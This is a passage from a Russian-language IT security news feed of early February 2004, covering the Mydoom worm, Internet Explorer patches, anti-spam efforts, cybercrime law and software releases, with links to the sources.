Конгресс США предлагает ужесточить законодательство за использование для преступлений в интернете сайтов, зарегистрированных под фальшивым именем. Как сообщается на сайте газеты Washington Post, по новому закону за мошенничество и подлог в виртуальной сфере полагается наказание до семи лет лишения свободы и крупные денежные штрафы. Наиболее частым нарушениям в этой области является распространение материалов без разрешения обладателя авторских прав. Владельцев сайтов зачастую отследить невозможно, так как при регистрации они указывают вымышленные имена и контактные телефоны. Корпорация по распределению номеров и имен в Интернете(ICANN), осуществляющая надзор за распределением сетевых адресов по соглашению с правительством США, настаивает, чтобы компании, продающие доменные имена, требовали от своих клиентов предоставления точных данных. Однако, с другой стороны, многие отказываются указывать свое настоящее имя и адрес, опасаясь вмешательства в свою частную жизнь, поскольку все эти сведения хранятся в открытом доступе. Новый закон предлагает компромиссное решение. Лица, предоставившие неверные данные при регистрации доменного имени, подлежат наказанию только в том случае, если они сделали это для сокрытия преступлений в интернете.
Подробности - http://www.washingtonpost.com/wp-dyn/articles/A13538-2004Feb4.html

6/02/2004 11:25 И ещё одна утилита для удаления Mydoom.A.
Network Associates тоже решила внести свой вклад в деле борьбы с трояном Mydoom.A и выпустила бесплатную утилиту McAfee AVERT Stinger весом в 723 кБ. Утилита не требует инсталляции, а представляет собой обычный сканер, позволяющий определить ии удалить около 36 различных троянов, вирусов.
Утилита - http://vil.nai.com/vil/stinger/

6/02/2004 10:42 Новый координатор борьбы с киберпреступностью в Европе.
Еврокомиссия «дала зеленый свет» на создание Общеевропейского подразделения по борьбе с киберпреступностью, которое будет объединять усилия полиции всей Европы. ENISA (Европейское Агентство по информационной безопасности), основанное в Брюсселе, было создано после того, как Еврокомиссия осознала необходимость синхронизировать усилия по обеспечению безопасности в Интернет и других сетях во всей Европе. Для начала ENISA поработает 4 года с бюджетом в 24.3 миллиона Евро с потенциалом стать постоянной организацией, если работу агентства признают успешной. Члены Еврокомиссии серьезно подчеркивали, что агентство создается не для того, чтобы быть единым подразделением по борьбе с киберпреступлениями во всей Европе, а скорее, как общий исследовательский и образовательный центр, где каждое региональное подразделение будет централизованно хранить материалы и данные для более эффективного использования. Одна из целей создания ENISA - повышение осведомленности государства, бизнес-сектора и общества в целом на предмет угроз безопасности, которые представляют вирусы и враждебные коды.
Источник - http://www.crime-research.ru

5/02/2004 15:47 Краткий обзор Red Hat Enterprise Linux 3.
На сайте unixreview.com опубликована статья Joe Casad, автора нескольких книг ("Teach Yourself TCP/IP in 24 Hours", "Network Professional Library: Active Directory") по UNIX и (по совместительству?) инженера из Канзаса (попутно Джо был ранее главным редактором UnixReview.com), которая посвящена обзору дистрибутиву Linux, выпускаемому RedHat - RHEL 3 - Red Hat Enterprise Linux 3. В свете новостей о поддержке RedHat и изменения политики (прекращение поддержки бесплатных дистрибутивов RedHat и переход на поддержку RHEL, хотя и остаётся вариант бесплатный дистрибутив Fedora Core) обзор RHEL наверняка может оказаться полезным СИСАДМИНам. Хотя... Хотелось бы заметить, что RedHat таки продолжает выпускать критичные патчи для версий 7.2, 7.3 и 9.0 (поддержка которого закончится в конце марта). Кстати, если кого заинтересовал дистрибутив RHEL - его можно получить с сайта Дмитрия Шурупова - http://www.nixp.ru/
Обзор - http://www.unixreview.com/documents/s=8989/ur0402c/

5/02/2004 15:12 Жесткое внедрение DLL в Windows-программы.
В рамках проекта на конкурс статей, организованного BugTraq.Ru совместно с компанией Digital Security и издательством "Питер" ("BugTraq 3/4") опубликована довольно интересная статья автора с ником Kr0m, которая посвящена описанию методики внедрения своей DLL-библиотеки в программы, имеющие достаточно свободного места в секции с таблицей импорта. Внедрение своего кода в чужую программу может понадобится для множества задач, например, для отладки и анализа работы приложений, для установки различного рода программных защит, для "шпионских" целей. Тексты программ, приведенные в статье, тестировались в среде Borland C++ Builder 6.0. Работа приложения проверялась в среде Windows 2000, среда Windows 9x в силу морального устаревания не рассматривалась (смелое утверждение и достаточно спорное - прим. ньюсмейкера). Кстати, желающие поспорить с автором могут писать по приведённому в начале статьи почтовом адресу.
Статья - http://bugtraq.ru/library/programming/harddll.html

5/02/2004 14:52 Unix и Windows -- cиамские близнецы?
Знак вопроса поставлен мной (newsmaker). На сайте украинского ITConline опубликована статья Андрея Зубинского, в которой автор пытается рассмотреть ПО, недавно выпущенного на бесплатной основе SFU 3.5 - Microsoft Windows Services for Unix. SFU, в отличие от хорошо известных "имитаторов" типа Cygwin и U/WIN, не является программой пользовательского уровня (иначе говоря -- надстройкой над доступным пользовательским программам API Windows). Это нечто совершенно иное. Собственно "иности" SFU и обязан своим появлением этот краткий обзор. Как нам кажется, многим было бы интересно ознакомиться с этим материалом и решить для себя - насколько правильно поставлен в теме знак вопроса. ;)
Обзор - http://itc.ua/article.phtml?ID=16150

5/02/2004 14:33 Microsoft выпустила бету ОС Windows XP для Athlon 64.
Компания Microsoft заявила о выпуске бета-версию ОС Windows XP, работающую на рабочих станциях, использующих процессоры AMD Athlon 64 или AMD Opteron. Бета-версия ПО для AMD-процессоров стала доступной в сети разработчиков Microsoft ещё в сентябре. Теперь же любой пользователь ПК с новым процессором от AMD может получить новую версию системы с сайта компании Microsoft через Customer Preview Program. Компания заявила, что клиентам придётся заплатить за получение беты на компакт-диске, но на сайте Microsoft система доступна бесплатно. Полная версия ОС сначала ожидалась в первой половине года, сразу после выпуска процессора Athlon 64, но теперь AMD и Microsoft передвинули срок появления продукта на вторую половину. В настоящее время пользователи Athlon 64 и Opteron работают в обычной, 32-биной версии системы и воспользоваться преимуществами новой 64-битной архитектуры они не могут. Уже доступны несколько 64-битных версий ОС Linux, но приложений, поддерживающих 64-битный режим, по-прежнему недостаточно. Ситуация должна серьёзным образом измениться с появлением полной версии новой Windows XP. Источник - http://www.cnews.ru

5/02/2004 13:39 Интернет-инженеры планируют уничтожить непрошенную рекламу.
Техническая команда, ответственная за развитие интернет-стандартов, работает в направлении обуздания бесконтрольных навязчивых рассылок непрошенной рекламы. Новые стандарты должны сделать возможным проверить, является ли адрес с которого пришла электронная почта, подлинным. Это должно предотвратить использование подложных адресов спамерами. Группа Исследования противоспамных технологий (ASRG) и подгруппа IRTF (Исследования интернет-технологий), в настоящее время работают над новыми техническими стандартами, которые могли бы перекрыть потоки спама. Объем спама вырос в течение прошлого года до критических размеров, больше чем половина всей электронной почты - спам. Широко распространенное использование фильтров и блокирующего ПО не сумело остановить повышающийся поток. Одна из ключевых проблем - то, что текущий стандарт, управляющий посылкой и получением электронной почты - SMTP, не включает никаких защитных технологий и не может распознать поддельных адресов электронной почты. "Корень проблемы - SMTP-протокол", - говорит Стив Линфорд, глава британской anti-spam группы Spamhaus. Главный объект надежд коалиции - исследуемое ASRG изменение системы доменных имен и DNS, чтобы идентифицировать компьютеры, действующие как серверы рассылки. DNS сервер обычно только связывает имя вебсайта с определенным IP адресом, что и позволяет нам запоминать названия, а не последовательности цифр. Но DNS сервер мог бы и проконтролировать IP адреса всех почтовых серверов, используемых каждым сайтом. Почтовые программы тогда могли бы безошибочно определить, откуда прибыла электронная почта.
Источник - http://news.proext.com/inet/13321.html

5/02/2004 13:22 Электронный журнал "Спамтест" No. 35.
Вышел очередной номер электронного журнала "Спамтест", посвящённого проблеме борьбы со спамом в России. В этом номере представлены разделы: Новости, Mydoom сражается с пользователями интернета, Ответы на вопросы читателей. В номере в том числе отмечен факт борьбы спамеров с одним из членов антиспамерской коалиции - компании "Ашманов и Партнеры". Для этого была произведена провокационная спамерская рассылка якобы от имени компании, предлагающая различные услуги и содержащая ссылки на ведущие сайты компании. Было разослано несколько крупных партий спама, в том числе и на английском языке, в которых предлагались различные услуги в области IT-технологий (от фильтрации собственно спама до продвижения сайтов в поисковых системах). Да... Нелегко бороться с этой чумой начала 21 века. Выражаем солидарность антиспамерской коалиции в их нелёгком, но таком нужном всему Рунету деле.
Подробности - http://www.kaspersky.ru/news.html?id=145500487

5/02/2004 13:08 Патч Microsoft для IE оставляет пользователей за порогом.
На этой неделе Microsoft устранила пробел в защите Internet Explorer, но в результате некоторые пользователи оказались отрезанными от определенных веб-сайтов. Выпущенный на этой неделе критический секьюрити-патч для устранения уязвимостей в Internet Explorer лишил многих пользователей возможности обращаться к некоторым веб-сайтам и интернет-ресурсам. Последнее обновление Microsoft IE, вышедшее вне ежемесячного цикла выпуска поправок, не допускает применения браузера для передачи зловредного кода в ПК и исправляет ошибку подмены URL, но при этом исключает возможность использования URL для доступа к интернет-ресурсам, защищенным паролем — функции, которую задействуют многие компании. Ричард Экскоффер, основатель развлекательного веб-сайта для взрослых Toteme, сообщил ZDNet UK, что обновление IE вызвало жалобы многих его заказчиков, которые лишились доступа к сайту: «Мы распространяем свое ПО как shareware, а в процессе регистрации используется эта функция для связи с нашими серверами. Мы сразу же получили множество жалоб, так как пользователи не могли обращаться к контенту и ресурсам, за которые они заплатили». К тому же эффект от установки патча, похоже, не всегда одинаков. Некоторые пользователи обнаружили, что IE все равно можно применять для доступа к ресурсам, защищенным URL-паролем, вопреки утверждению Microsoft. Хмм... Ещё один повод использовать альтернативные (читайте - более быстрые и менее тяжёлые) браузеры? ;))) Такое ощущение, что M$ сама роет яму своему любимому IE.
Подробности - http://news.zdnet.co.uk/0,39020330,39145482,00.htm

5/02/2004 12:44 В США создают ПО для слежки в интернете.
Небольшая компания MetaCarta, основанная сотрудниками Массачусетского технологического института (MIT), разрабатывает шпионское программное обеспечение, позволяющее отслеживать местоположение авторов каких-либо электронных документов, писем или интернет-сайтов. Предполагается, что система MetaCarta, будет использоваться, в основном, разведывательными службами и специальными организациями по борьбе с террористами и киберпреступниками. Финансирование исследований осуществляет Агентство перспективных оборонных разработок Министерства обороны США (DARPA) совместно с ЦРУ. В основе программы лежит анализ десятков тысяч документов, электронных писем и веб-страниц на предмет наличия в них конкретных ключевых слов. В случае обнаружения заданных последовательностей символов, система начинает детально изучать весь текст, пытаясь выделить географические названия, упоминания улиц и пр. Результат анализа отображается в виде значка на карте, указывающего пункт, в наибольшей степени соответствующий введенному запросу. Причем система MetaCarta снабжена некоторыми зачатками искусственного интеллекта, благодаря которым, к примеру, программа может отличить имя или фамилию от идентичного по написанию названия населенного пункта.
Источник - http://www.compulenta.ru

4/02/2004 18:19 Бюллетень CERT об уязвимостях в Internet Explorer.
2 февраля выпущен бюллетень по безопасности CERT TA04-033A, посвящённый описанию трёх уязвимостей, существующих в браузере Internet Explorer. Все эти уязвимости были описаны в бюллетене по безопасности от Microsoft MS04-004, вышедшем позавчера. Естественно, всем, пользуюшимся этим браузером, рекомендуют обновиться с сайта M$.
Источник - http://www.cert.org

4/02/2004 18:09 Факты о трояне Mydoom.
Исследователь компьютерной безопасности из Израиля Gadi Evron сообщает, что им и его коллегами собрана полная информация о трояне Mydoom (он же Novarg). Информация опубликована на сайте для того, чтобы избежать различных домыслов и слухов, которые в настоящее время существуют. В том числе приведён дизассемблированный код трояна. Во втором документе приведены данные о DDoS-атаках.
Подробности - http://www.math.org.il/newworm-digest1.txt
DDoS - http://www.math.org.il/mydoom-facts.txt

4/02/2004 17:07 Visa «убивает» фальшивые веб-сайты.
Сегодня международная компания Visa обнаружила и закрыла ряд «веб-ресурсов обманок», организаторы которых пытались выудить персональную информацию у владельцев кредитных карточек. Кроме того, Visa предупредила о появлении серии электронных запросов, которые запустили онлайновые мошенники. «К сожалению, криминальные личности постоянно ищут новые пути, чтобы заставить потребителей раскрыть финансовую информацию», - прокомментировал Брюс Мэнсфилд, генеральный менеджер компании в Австралии и Новой Зеландии. – «Время от времени злоумышленники имитируют официальные веб-сайты компаний, чтобы завладеть персональной информацией клиентов.Visa не застрахована от подобной практики. Тем не менее, компания предпринимает определенные шаги в направлении безопасности обладателей кредиток». Незамедлительные меры по оповещению клиентов остаются одним из самых важных методов пресечения активности мошенников.
Источник - http://www.runet.ru

4/02/2004 16:29 Защита от дурака.
В "Компьютерре" опубликована небольшая заметка Евгения Золотова, суть которой сводится к защите от спама и разнообразных накруток, которые применяются недобросовестными Вэб-мастерами и прочими "кликерами". Наверняка многие из вас видели этот метод защиты при отправке SMS с сайтов московских провайдеров сотовой связи. При этом посетителю, отправляющему сообщение, предлагается ввести цифровой код, который выводится в виде графической картинки.
Подробнее - http://www.computerra.ru/focus/coment/31865/print.html

4/02/2004 15:54 Выход NMAP 3.50.
вышла очередная версия самого, пожалуй, продвинутого сканера NMAP. В новой версии добавлены сотни отпечатков сервисов и операционных систем, кроме того, очень много изменений во внутренней структуре программы. Исправлено большое количество ошибок как для UNIX, так и для Windows-версии программы.
Подробности - http://www.insecure.org/nmap/nmap_changelog.html

4/02/2004 12:10 Internet по электросети.
Представители европейских энергетических компаний, производителей телекоммуникационного оборудования, консалтинговых фирм и вузов встретились в Мадриде для выработки деталей инициативы по созданию в ЕС сети передачи данных по линиям электроснабжения (power line communications, PLC). Этот четырехлетний проект получил название Open PLC European Research Alliance (OPERA). Его основным инициатором и источником финансирования является Европейская Комиссия. Ряд крупных компаний, включая Siemens и Nortel Networks, начав в прошлом разработку технологий передачи данных по линиям электроснабжения, впоследствии отказались от этих проектов ввиду отсутствия стандартов и будучи убежденными в том, что рынок Internet-доступа по электросети будет сугубо нишевым. Однако в Комиссии убеждены, что это мнение неверно и планируют воспользоваться PLC для обеспечения широкополосным Internet-доступом сельских территорий и регионов с малоразвитой инфраструктурой. Первый двухлетний этап проекта OPERA будет посвящен выработке всеобщего европейского стандарта PLC. Предполагается, что скорость передачи данных по электропроводам составит 10 Мбит/c, а возможно, и более. Кроме Internet-доступа у PLC будут и другие области применения: телефония, автоматическое считывание показаний счетчиков электроэнергии, обеспечение безопасности и домашние локальные сети.
Источник - http://www.osp.ru

4/02/2004 11:19 Выход ядра Linux 2.6.2.
3 февраля Линус Торвальдс сообщил о выходе новой версии ядра Linux 2.6.2. В него включены различные дополнения от Эндрю Мортона в части архитектуры PowerPC, улучшения в ACPI, багофиксы работы с IEEE1394.
Подробности - http://lkml.org/lkml/2004/2/3/226

4/02/2004 10:39 Новая операционная система для процессоров Z80.
Компания Zilog представила 28 января ядро новой операционной системы реального времени RZK. Предназначена она для восьмиразрядных процессоров и микроконтроллеров серии eZ80Acclaim. Эти чипы являются модификациями процессора Z80, беспрерывно выпускаемого Zilog с 1976 года. Эти процессоры активно использовались в самых различных областях от - домашних компьютеров 1980-ых годов и карманной игровой приставки Nintendo GameBoy до различных встраиваемых систем. Именно в последней области эти процессоры активно применяются сегодня. RZK представляет собой ядро операционной системы реального времени, которая может управлять работой процессора, в том числе и при выполнении критически важных задач. Ядро поддерживает многозадачность, причем планирование процессов может осуществляться как в кооперативном режиме, так и в режиме разделения времени. Операционная система состоит из отдельных объектных модулей. Модульная система позволяет обойтись без повторной разработки часто используемых функций и сокращает сроки вывода на рынок конечных продуктов. Новая операционная система может гибко конфигурироваться под решение различных задач. Для ее размещения достаточно 18 кб ПЗУ. Что касается процессоров и контроллеров eZ80, то они могут адресовать до 16 Мб оперативной памяти и имеют двойные процессорные регистры для обеспечения быстрого контекстного переключения (для этого RZK требуется 12 микросекунд) и обработки событий в реальном времени.
Источник - http://www.compulenta.ru

4/02/2004 10:13 I-Worm.Mydoom: не верьте проходимцам!
31 января на множестве сайтов компьютерного андеграунда была опубликована якобы новая, сенсационная информация о черве Mydoom от некоего «независимого исследователя» по имени Юари Босникович (Juari Bosnikovich). Согласно высказываниям «исследователя», антивирусные компании скрывают правду о ряде функций, присутствующих в коде вируса. Так, по словам Юари, вирус написан на ассемблере, но таким образом, чтобы выглядеть написанным на языке C++. Из этого факта Юари делает смелый вывод: раз он написан на ассемблере, значит, бОльшая часть его функциональности осталась нераспознанной экспертами антивирусных компаний. Господин Босникович предупреждает, что на самом деле вирус отнюдь не прекратит свою активность 12 февраля 2004 года, как сообщают антивирусные эксперты, а «будет обновлен» и «мутирует» в версию Mydoom.c. Затем следуют заявления о заражении червем BIOS компьютера, куда, якобы, записывается код длиной в 624 байта. Этот код открывает TCP-порт, если системная дата превышает 12 февраля 2004 года. В качестве заключения своих «исследований» г-н Босникович выдвигает предположение о всемирном заговоре антивирусных компаний, которые «пытаются что-то скрыть», и обвиняет ведущие антивирусные лаборатории в некомпетентности. На сайте "Лаборатории Касперского" от имени антивирусных компаний опубликована статья, посвящённая разоблачению всех данных, которые, якобы, имели место. Во-первых, для настоящих антивирусных исследователей не существует разницы между ассемблером и C++, ведь они изучают вовсе не исходные коды вредоносной программы, а результаты работы дизассемблера, которые всегда показывают все заложенные в коде функциональные возможности вне зависимости от языка программирования, при помощи которого этот код был создан. Во-вторых, встроенный в семейство червей Mydoom механизм удаленного администрирования, продолжающий свою работу и после 12 февраля 2004 года, позволяет злоумышленникам загружать на зараженные компьютеры любые программы на свое усмотрение. Это может быть и новая модификация вируса Mydoom, которая, что совершенно логично, будет иметь версию «c». Однако в данный момент этой версии в интернете не существует, и никаких выводов о её чрезмерной опасности сделать невозможно - особенно исходя из анализа кода существующих версий червя. В-третьих, нельзя записать вредоносный код в 624 байта длиной в BIOS компьютера. Причин здесь сразу несколько. Для начала придется что-то стереть из существующей прошивки BIOS, после чего компьютер попросту откажется запускаться. Далее: на свете существует несметное множество BIOS от разных производителей, которые изменяются от версии к версии и от материнской платы к другой материнской плате настолько, что предусмотреть наличие места даже для 624 байт во всех компьютерах и всех версиях прошивок представляется совершенно нереальным. На практике это означает, что если бы Mydoom что-то записывал в BIOS, почтовые ящики службы технической поддержки «Лаборатории Касперского» были бы переполнены письмами от пользователей, у которых попросту перестали включаться компьютеры. Но этого нет.
Более подробно - http://www.viruslist.ru/index.html?tnews=1001&id=144536917

4/02/2004 10:07 Microsoft отразила атаку интернет-червя MyDoom.B.
Представители компании Microsoft сообщили, что им удалось во вторник отразить атаку вируса MyDoom.B, в задачи которого входило выведение из строя некоторых веб-серверов компании, передает агентство Associated Press.
По планам разработчиков вируса, зараженный MyDoom компьютер должен был отправлять на серверы Microsoft тысячи запросов в минуту, тем самым вызывая сбои в их работе. Представители Microsoft не сообщили, как именно им удалось нейтрализовать атаку. Как отметили специалисты по интернет-безопасности, MyDoom.B распространялся намного медленнее своего младшего брата. Представители Microsoft также сообщили, что компьютерам, заразившимся новым вирусом было отказано в доступе к сайтам компании. Для пользователей этих машин был создан специальный сайт information.microsoft.com.
Подробности - http://news.yahoo.com/news?tmpl=...

3/02/2004 13:28 Apple выпустил обновление Safari.
2 февраля компания Apple Computer выпустила обновление для своего KHTML веб-браузера Safari. Кроме повышения стабильности работы, Safari 1.2 так же включает несколько новых возможностей. Safari 1.2 позволяет использовать персональные сертификаты, выпускаемые сертификационными центрами для защищённой аутентификации на поддерживающих эту функцию сайтах, поддерживает LiveConnect для связи между JavaScript и веб-сайтами, использующими Java и требующими двухсторонней связи между браузером и Java-апплетами. Кроме того, теперь с приложением и страницами можно будет работать исключительно с клавиатуры без использования мыши, а возможность докачки файлов позволит пользователям продолжить получать файлы, если этот процесс был прерван. Как и в предыдущих релизах, Apple распространит исходные коды изменений, внесённый в KHTML-браузер в сообществе разработчиков открытого кода. Новую версию Safari можно скачать с корпоративного веб-сайта компании Apple или через панель управления обновлением программного обеспечения в Mac OS X.
Источник - http://p2pnet.net/

3/02/2004 13:04 Домашние телефоны россиян стали секретными.
Домашние телефонные номера всех жителей России стали секретными. В соответствии с новым законом "О связи", справочные службы "09" вправе предоставлять и публиковать в телефонных справочниках лишь те номера, хозяева которых дали на то личное письменное согласие. За месяц, прошедший с тех пор, как закон вступил в силу, лишь ничтожный процент жителей страны согласился с тем, чтобы собственный телефон мог быть доступен каждому, пишет газета “Известия”. Как считают связисты, пройдет не меньше двух лет, прежде чем справочные службы российских городов смогут работать с прежней эффективностью. Можно сказать, что новый закон "О связи" население страны восприняло с редкой готовностью его исполнить. Вот, например, на протяжении уже месяца филиал "Волгателеком" в Ульяновске призывает граждан через все местные СМИ написать согласие на размещение их телефонов в справочной базе. Результат: из более чем 250 тысяч абонентов разрешение дали всего несколько человек. "У нас база пустая! Ну кто пойдет специально писать заявление? - поделилась старшая смены телефонной справки "09" Санкт-Петербурга. Связисты ломают голову, как в массовом порядке заполучить от питерцев письменные согласия, и завидуют своим коллегам из маленьких городов, сумевшим грамотно "провести агитацию" среди граждан. "Светиться" действительно хотят немногие. В полуторамиллионном Екатеринбурге таких пока всего 320 человек. В Нижнем Тагиле - 400. Лишь трое из почти 90 тысяч абонентов Йошкар-Олы. В Иванове - только четыре человека, во Владимире - 438, в Ярославле - 894.
Источник - http://www.cnews.ru

3/02/2004 12:33 Очередной бюллетень по безопасности от Microsoft.
Корпорация Microsoft в понедельник выпустила новый бюллетень безопасности MS04-004, сообщает "Компьюлента". В нем описывается патч, устраняющий сразу три уязвимости в браузере Internet Explorer. Первая из заделанных дыр была обнаружена еще в середине декабря прошлого года. Суть ошибки сводится к тому, что хакер может отобразить в адресной строке поддельный URL, не соответствующий реальному. В результате, веб-страница, содержащая вредоносный код, может быть замаскирована под заслуживающий доверия ресурс, что, в свою очередь, приведет у утечке персональной информации. Вторая уязвимость позволяет злоумышленнику сохранить на локальном диске компьютера какой-либо файл без предварительного согласия пользователя. Для этого нужно лишь заманить владельца атакуемой машины на сформированный особым образом сайт и вынудить его кликнуть по ссылке. Наконец, последняя ошибка связана с реализацией модели междоменной защиты браузера и позволяет хакеру получить полный доступ к файловой системе удаленного ПК. Все дыры получили рейтинг критической важности и требуют немедленной установки патча, который можно загрузить на официальном сайте софтверного гиганта. Следует заметить, что уязвимости представляют угрозу лишь для пользователей компьютеров, на которых установлены браузеры Internet Explorer версий 6.0, 5.01 и 5.5 под управлением операционных систем Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, Windows XP и Windows Server 2003.
Подробности - http://www.microsoft.com/technet/treeview/?.../MS04-004.asp

3/02/2004 11:26 Улики указывают на единый источник MyDoom.
Похоже, у двух версий вируса MyDoom один и тот же автор. По мнению Джимми Куо, сотрудника отделения McAfee секьюрити-фирмы Network Associates, имя andy, оставленное в коде автором вируса MyDoom, связывает оригинальную программу, выпущенную неделю назад, с вариантом В, появившемся два дня спустя. Есть и другие намеки на это. В частности, номера, которые, похоже, обозначают версию программы, указывают на то, что быстро распространившийся вирус создан профессиональным программистом. «Создается впечатление, что кто-то проставлял их при проверке исходного кода, — говорит Куо, исследовавший вирус. — В этом случае andy — имя человека, проверявшего код». Помимо того, автор оставил во второй версии вируса сообщение для тех, чьи ПК окажутся заражены его программой: «Извините, я просто выполняю свою работу. Ничего личного». Хотя некоторые эксперты считают, что код MyDoom изготовлен в России, «пациента зеро» — первый зараженный компьютер — или того, кто действительно выпустил вирус, определить почти невозможно, утверждает Куо. Анализ выявил также хорошие новости для Microsoft. Куо говорит, что ошибка в программе вируса может привести к тому, что атаковать Microsoft, начиная со вторника, будут только 7% компьютеров, зараженных вариантом вируса В.
Подробности - http://zdnet.com.com/2100-1105_2-5152278.html

3/02/2004 10:01 Вместо выплаты 21000 фунтов стерлингов британский хакер отработает 200 часов.
Британский подросток, взломавший в июне 2002 года компьютерную сеть американской правительственной лаборатории, проведет 200 часов, занимаясь общественно полезным трудом. Такое решение принял королевский суд Саутворка (Southwark Crown Court) в Лондоне. Суд отказался удовлетворить выдвинутое обвинением требование возместить нанесенный хакером ущерб в размере 21 000 фунтов стерлингов (около 38 000 долларов США), решив, что 19-летний студент первого курса университета Эксетера ( Exeter University) Джозеф МакЭлрой (Joseph McElroy) не в состоянии выплатить такую сумму. МакЭлрой воспользовался слабостью системы идентификации пользователей компьютерной сети лаборатории Ферми, занимающейся изучением физики элементарных частиц высоких энергий (Fermi National Accelerator Laboratory), расположенной в американском городе Чикаго (Chicago). Молодой хакер не пытался получить доступ к секретной информации, он использовал пропускную способность сети лаборатории для того, чтобы скачать из Интернета большое количество музыкальных файлов и лицензионных фильмов. Деятельность хакера привела к тому, что в лаборатории была объявлена тревога. Из-за опасений, что несанкционированный доступ могли получить террористы, взломанный компьютер не включали в течение трех дней.
Подробности - http://news.bbc.co.uk/2/hi/technology/3452923.stm

2/02/2004 19:10 DirectX немного подрастёт.
рудно найти пользователя, которые не знает о существовании набора DirectX. В скором будущем ожидается появление обновленного пакета DirectX 9.0c. Он содержит улучшенный модуль с поддержкой Shaders 3.0. Именно он должен придать изображению высокую точность и скорость прорисовки. Когда ждать программный продукт? Разработчик заявляет, что DirectX 9.0c появится в конце марта.
Источник - http://www.km.ru

2/02/2004 18:54 Построение файрволла Linux с использованием iptables.
На сайте InformIT опубликована наверняка интересная для СИСАДМИНов статья, посвящённая описанию процесса построения файрволла на базе ОС Linux с использованием iptables. Авторство статьи принадлежит, как это ни странно, Sun Microsystems при поддержке известнейшего издательства Prentice Hall PTR. Пакет iptables, как известно, появился в составе ядер версий 2.4 и фактически пришёл на смену ipchains. Статья более ориентирована на построение правил фильтрации и защиты одного, конкретно взятого сервера и не ориентирована на защиту корпоративной сети, хотя, наверняка, описанные методы и способы могут быть применены для защиты всей сети. Процесс построения защиты описан на примере RedHat Advanced Server 2.1 и SuSE Enterprise Server 8.
Статья - http://www.informit.com/isapi/product_id...

2/02/2004 18:06 В Бенилюксе Lindows объявлена вне закона.
Продавец Linux проиграл первое из нескольких судебных дел о торговых марках, возбужденных Microsoft. В пятницу компания, распространяющая версию операционной системы Linux, предназначенную для имитации Microsoft Windows, подтвердила, что суд в Нидерландах вынес постановление против нее по иску Microsoft, которая утверждает, будто название Lindows нарушает торговую марку Microsoft Windows. Судья окружного суда Амстердама вынес предварительное решение, запрещающее компании продавать или рекламировать в Нидерландах, Бельгии и Люксембурге любые продукты под торговой маркой Lindows. Аналогичные постановления уже приняли суды Финляндии и Швеции. Такой же иск Microsoft подала против Lindows и в США, но здесь судья несколько раз отклонял требование Microsoft вынести постановление о запрете Lindows на том основании, что «окна» — это общий компьютерный термин, который не может носить статус торговой марки. Слушания по этому делу должны состояться 1 марта в окружном суде США в Сиэтле. Генеральный директор Lindows Майкл Робертсон сказал, что Microsoft, прежде чем выносить спор о торговых марках в другие страны, должна была дождаться решения американского суда. «Им не удалось добиться успеха в США, и теперь они выбирают страны, где суды более покладистые», — говорится в заявлении Робертсона.
Подробности - http://news.zdnet.co.uk/software/linuxunix/0,39020390,39145220,00.htm

2/02/2004 17:40 Обзор вирусной активности за январь 2004 г. от "Лаборатории Касперского".
"Лаборатория Касперского" подвела итоги первого месяца 2004 г. Естественно, на первом месте появившийся 27 января новый червь - I-Worm.Mydoom.a - 78.32% вирусных инцидентов. Менее чем за одну неделю он превзошел показатели распространенности прошлогоднего лидера, червя Sobig.f, и уверенно вышел на первое место вирусного «хит-парада», сгенерировав более 75% зараженного почтового трафика. На втором месте со значительным отрывом - I-Worm.Swen - 6,57%. На третьем - I-Worm.Mimail.c - 3.63%. Помимо вездесущего Mydoom январская двадцатка самых распространенных вредоносных программ пополнилась тремя новичками. Во-первых, I-Worm.Bagle, эпидемия которого началась в середине января и могла бы стать самым заметным событием месяца, если бы не появление Mydoom. Затем, очень интересно возникновение в топе макро-вируса Swatch.b. Он был обнаружен еще в сентябре 2002 года, однако до сих пор ему не удавалось выйти на более-менее значимые позиции в рейтинге вирусной активности. Сложно сказать, чем вызван столь стремительный рост распространенности этого макро-вируса, однако сам факт его появления, вкупе с двумя другими макро-вирусами нашей двадцатки, заставляет констатировать, что слухи о кончине вирусов для MS Word пока слухами и остаются. Последним новичком января стал очередной вариант почтового червя Dumaru - Dumaru.j. Четыре новых вируса и вернувшийся в рейтинг Lentin.g полностью вытеснили из 20-ки традиционные файловые вирусы и «бэкдоры».
Подробнее - http://www.kaspersky.ru/news.html?id=145449852

2/02/2004 16:34 Учебные курсы Red Hat переводятся на использование Red Hat Enterprise Linux 3.
Российская фирма "Инвента", предоставляющая услуги по обучению специалистов работе с программными продуктами компании Red Hat, объявила об обновлении своих учебных курсов, cообщает "Компьюлента". Это связано с тем, что Red Hat обновляет всю линейку своих курсов подготовки технических специалистов для формирования навыков работы с продуктами серии Red Hat Enterprise Linux 3. Компания "Инвента" является сертифицированным партнером Red Hat по обучению и сертифицированным деловым партнером Red Hat. Поэтому с 1 февраля 2004 года при проведении курсов учебным центром компании "Инвента" используется Red Hat Enterprise Linux 3, и слушатели получают практические знания по использованию продуктов линейки Red Hat Enterprise Linux и сертификат RHCE по Red Hat Enterprise Linux 3. Специалисты, имеющие сертификат RHCE по предыдущей версии Red Hat Linux, могут обновить его на специальных условиях, для соответствия требованиям к специалистам по Red Hat Enterprise Linux 3, пройдя обучение по курсу RH300 и/или сдав экзамен RH302 до 15 марта 2004 года.
Подробности - http://www.rhd.ru/rhce_upgrade.html?f=ihp

2/02/2004 13:06 Есть ли методы против российских спамеров?
Возможно, скоро появится шанс это узнать, сообщает www.bugtraq.ru. В конце 2003 года ведущий сайта "Интернет и Право" Антон Серго и Рабочая группа Проекта "АнтиСпам" подали заявления в Министерство по антимонопольной политике и поддержке предпринимательства с жалобой на нарушение Федерального закона "О рекламе" со стороны двух самых одиозных российских спамеров - "Центра американского английского" и "Российской информационной сети". В списке претензий - скрытая реклама, недостоверная реклама, заведомо ложная реклама, неэтичная реклама и др. В настоящее время МАП ведет проверку, по результатам которой спамерам грозит наложение штрафа в размере до 500 МРОТ. Отмечается, что стремление найти решение в рамках существующего законодательства нашло понимание у представителей Министерства юстиции. Насколько данный подход окажется эффективным - покажет время.
Подробности - http://www.ifap.ru/pr/2004/040127a.htm

2/02/2004 12:04 Mydoom вывел из строя сайт SCO.
